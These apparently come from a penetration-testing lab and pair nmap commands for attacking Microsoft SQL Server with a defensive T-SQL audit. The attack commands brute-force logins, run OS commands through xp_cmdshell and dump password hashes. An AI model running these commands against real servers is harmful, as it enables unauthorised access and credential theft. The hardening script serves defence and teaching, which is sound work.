MS SQL syntax
References: PentestLab link on testing MSSQL with nmap; Tally (HTB) by ippsec -- MS SQL reverse shell + command execution
nmap -p1433 --script ms-sql-info 10.11.1.31
# discover basic information about the instance (product version, instance name, named pipes)
nmap -p1433 --script ms-sql-brute 10.11.1.31
# brute-force / check for weak MS SQL account passwords using nmap's default user and password lists
nmap -p1433 --script ms-sql-brute --script-args userdb=/usr/share/wordlists/rockyou.txt,passdb=/usr/share/wordlists/passlist.txt 10.11.1.31
# same check with custom wordlists (no space after the comma, or nmap treats the second argument as a target)
nmap -p1433 --script ms-sql-empty-password 10.11.1.31
# check for logins with a blank password
nmap -p1433 --script ms-sql-hasdbaccess --script-args mssql.username=sam 10.11.1.31
# list the databases the login 'sam' is allowed to access (add mssql.password=... if the account has a password)
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sam 10.11.1.31
# list the tables in each accessible database; the columns are listed as well
nmap -p1433 -sV 10.11.1.31
# service and version detection on the MSSQL port
In SQL Server 2000, xp_cmdshell was enabled by default, so command execution is possible as well.
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sam 10.11.1.31
# check whether commands can be run through xp_cmdshell as the login 'sam' (runs 'ipconfig /all' by default)
nmap -p1433 --script ms-sql-xp-cmdshell --script-args ms-sql-xp-cmdshell.cmd='whoami',mssql.username=sam 10.11.1.31
# run an arbitrary command on the server (here: whoami)
nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sam 10.11.1.31
# dump the MS SQL login password hashes (the login needs sysadmin-level rights to read them)
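The defender-side counterpart of the checks above, as an added example that is not part of the original notes or of the linked write-ups: a T-SQL audit run on the instance itself that shows what ms-sql-empty-password, ms-sql-brute, ms-sql-xp-cmdshell and ms-sql-dump-hashes would find, and closes the gaps. It assumes SQL Server 2005 or later (where sys.sql_logins and sys.configurations exist and xp_cmdshell ships disabled) and a login with sysadmin rights for the sp_configure and role-membership steps; the login name 'sam' is the one used in the notes above and stands in for whatever account the audit flags.

```sql
-- Added audit script (not part of the original notes). Assumes SQL Server 2005+
-- and a sysadmin login; run it in SSMS or sqlcmd against the instance.

-- 1. Is xp_cmdshell enabled?  value_in_use = 1 means the ms-sql-xp-cmdshell
--    script above will succeed for any login that may execute it.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Disable it, then hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. SQL logins with a blank password: exactly what ms-sql-empty-password probes for.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- 4. SQL logins that opt out of the Windows password policy or expiry checks;
--    these are the accounts ms-sql-brute is most likely to crack.
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM sys.sql_logins
WHERE is_policy_checked = 0 OR is_expiration_checked = 0;

-- 5. Is the built-in 'sa' login (always sid 0x01, even if renamed) disabled?
SELECT name, is_disabled
FROM sys.sql_logins
WHERE sid = 0x01;

-- 6. Members of sysadmin: any of these can read password_hash (what
--    ms-sql-dump-hashes collects) and can re-enable xp_cmdshell, so keep it short.
SELECT r.name AS role_name, m.name AS member_name, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON rm.role_principal_id = r.principal_id
JOIN sys.server_principals AS m ON rm.member_principal_id = m.principal_id
WHERE r.name = 'sysadmin';

-- 7. Put a flagged login back under the Windows password policy
--    ('sam' is the example login from the notes; substitute the flagged name).
ALTER LOGIN [sam] WITH CHECK_POLICY = ON, CHECK_EXPIRATION = ON;
```

Step 2 only flips the configuration flag; any sysadmin can flip it back with the same sp_configure call, so the membership list from step 6 is the control that actually decides whether xp_cmdshell stays off, and a change to it or to the xp_cmdshell setting is worth alerting on.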